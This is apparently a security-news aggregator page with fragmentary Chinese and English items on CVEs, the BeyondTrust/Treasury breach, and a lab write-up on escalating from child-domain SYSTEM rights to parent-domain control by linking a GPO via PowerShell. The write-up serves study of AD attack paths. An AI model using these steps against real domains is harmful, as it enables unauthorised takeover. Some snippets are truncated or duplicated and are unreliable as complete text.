Aggregator

2024年马上要和我们说再见了！回首这一年，我们心里有太多感慨和感谢。

不止有基础大模型，还有基础智能体。从只能语音对话的「Promt Agent」，进化为「能看见、有记忆、有技能」的「Foundation Agent」。

AGI 编程，将是我们从移动互联网时代，跨越到大模型时代的重要一步。

打开唱片机，让我一起去听过去的声音，唱片一圈圈转，转眼间2024已然进入尾声了。按照惯例又来到了一年一度的年终大盘点环节 ，让我们一起来回顾下今年的点点滴滴，再看看年度榜单以及抽奖活动，短暂驻足之后让

Security researchers Daan Keuper, Thijs Alkemade, and Khaled Nassar from Computest Sector 7 disclosed a critical vulnerability in TrueNAS CORE, a widely-used open-source storage operating system developed by iXsystems. The vulnerability, CVE-2024-11944, allows network-adjacent attackers to execute arbitrary code on affected installations without requiring authentication. This discovery was presented during the renowned cybersecurity competition Pwn2Own. 2024 […]

The post TrueNAS CORE Vulnerability Let Attackers Execute Remote Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A vulnerability classified as problematic has been found in SCO OpenServer 5.0.6. Affected is an unknown function of the component lpusers. The manipulation of the argument -u leads to memory corruption. This vulnerability is traded as CVE-2001-0576. Attacking locally is a requirement. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

远程管理软件 BeyondTrust 于 12 月 8 日通知美国财政部它遭到了黑客入侵，黑客窃取了被用于保护一云服务的密钥，该服务被用于为美财政部办公室用户提供远程技术支持。利用窃取的密钥，黑客绕过安全防线访问了用户的工作站和部分非机密文件。黑客被认为来自中国 APT 组织。美国财政部表示被入侵的 BeyondTrust 服务已经下线，没有证据表示对方能继续访问财政部的系统或信息。

远程管理软件 BeyondTrust 于 12 月 8 日通知美国财政部它遭到了黑客入侵，黑客窃取了被用于保护一云服务的密钥，该服务被用于为美财政部办公室用户提供远程技术支持。利用窃取的密

China-linked actors hacked US Treasury Department Pierluigi Pag

China-linked threat actors breached the U.S. Treasury Department by hacking a remote support platform used by the agency. China-linked threat actors breached the U.S. Treasury Department via a compromised remote support platform. The Treasury Department discovered the security breach on December 8th from its vendor BeyondTrust, according to a letter to lawmakers. BeyondTrust provides Privileged […]

前言

最近翻阅笔记发现一篇文章提到通过子域的System权限可以突破获取到父域权限，本文将对此技术进行尝试复现研究。

利用分析

环境信息：

子域：187、sub.cs.org
父域：197、cs.org

首先通过在子域的域控机器上打开mmc.exe->连接ADSI->配置来查看子域的配置命名上下文：

从配置中可以看到配置命名上下文的域名实际上是父域cs.org，因此判断子域中看到的信息可能是父域的副本：

继续查看配置对象的安全描述符中的ACL，发现子域没有权限去变更：

但是可以看到除了域用户、域管用户以外，还有一个特权ACL条目叫SYSTEM，该条目拥有完全控制权限：

SYSTEM属于一个特殊用户，不属于域内用户，因此理论上只要能做到是SYSTEM权限就能控制对象条目而不用关注是不是域内管理员。因此尝试使用SYSTEM权限继续打开配置命名上下文：

可以看到当子域拥有了SYSTEM权限后就可以修改来自父域副本的配置对象：

利用方式

既然可以控制父域的配置命名上下文，那如何利用呢？网上提到有几种方式，一种是通过GPO、还有的是提到给父域添加一个自己可控的证书模板(ESC1)，这里以GPO组策略为例。先在子域域控上创建一个GPO:

New-GPO jumbo_gpo_test

设置计划任务:

通过SYSTEM权限把子域的GPO link到父域：

PS C:\Windows\system32> Get-ADDomainController -Server cs.org | select HostNane, ServerObjectDN

HostNane ServerObjectDN
-------- --------------
{}       CN=10_4_45_197,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cs,DC=org PS C:\Windows\system32> New-GPLink -Name "jumbo_gpo_test" -Target "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cs,DC=org" -Server sub.cs.org


GpoId       : 76606696-cd03-4349-b0f2-0a45bdf305d4
DisplayName : jumbo_gpo_test
Enabled     : True
Enforced    : False
Target      : CN=Default-First-Site-Name,cn=Sites,CN=Configuration,DC=cs,DC=org
Order       : 1

父域刷新组策略可以看到子域链接过来的GPO：

父域更新组策略成功执行计划任务notepad.exe：

gpupdate /force

刷新组策略后通过gpresult /r命名也可以看到添加的GPO：

总结

本文介绍了除SidHistory以外还可以通过子域的System权限进行突破到父域的攻击手法。